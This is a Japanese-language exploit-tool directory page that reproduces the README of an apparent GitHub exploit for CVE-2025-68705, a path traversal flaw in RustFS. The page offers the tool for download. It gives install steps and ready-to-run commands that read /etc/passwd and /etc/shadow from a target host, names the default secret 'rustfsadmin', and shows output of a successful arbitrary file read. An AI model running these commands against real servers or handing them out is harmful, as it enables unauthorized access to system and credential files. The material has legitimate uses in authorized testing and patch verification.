Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-68705 — CVE-2025-68705 RustFS パストラバーサル脆弱性チェック | Kitploit
ツール/GitHubGitHub/imjdl/cve-2025-68705
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubimjdl/cve-2025-68705

CVE-2025-68705

CVE-2025-68705 RustFS パストラバーサル脆弱性チェック

リポジトリを見る
17ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-68705 - RustFS パストラバーサルエクスプロイト

概要

このスクリプトは、RustFS のパストラバーサル(ディレクトリトラバーサル)脆弱性(CVE-2025-68705)を悪用し、サーバー上の任意のファイルを読み取ることを可能にします。

必要条件

  • Python 3.6+
  • 依存関係については requirements.txt を参照してください

インストール

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt

使用方法

root@kitploit:~
python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]

必須引数

引数説明
-H, --hostターゲットホストのIPアドレスまたはホスト名
-p, --portターゲットのポート番号
-f, --file読み取るファイルパス(--check-only 使用時はオプション)

オプション引数

例

/etc/passwd ファイルを読み取る

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd

カスタムオフセットと長さで /etc/shadow を読み取る

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024

カスタムシークレットキーを使用する

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret

ターゲットが脆弱かどうかのみ確認する

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 --check-only

ファイルの特定範囲を読み取る

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200

出力例

root@kitploit:~
python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!

[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1       localhost
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp

ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。

参考文献

  • RustFS セキュリティアドバイザリ
  • CVE-2025-68705
ツールをダウンロード
引数説明デフォルト
-s, --secret署名用のシークレットキーrustfsadmin
-o, --offsetファイル読み取りオフセット0
-l, --length読み取るバイト数4096
--check-onlyターゲットが脆弱かどうかのみ確認する-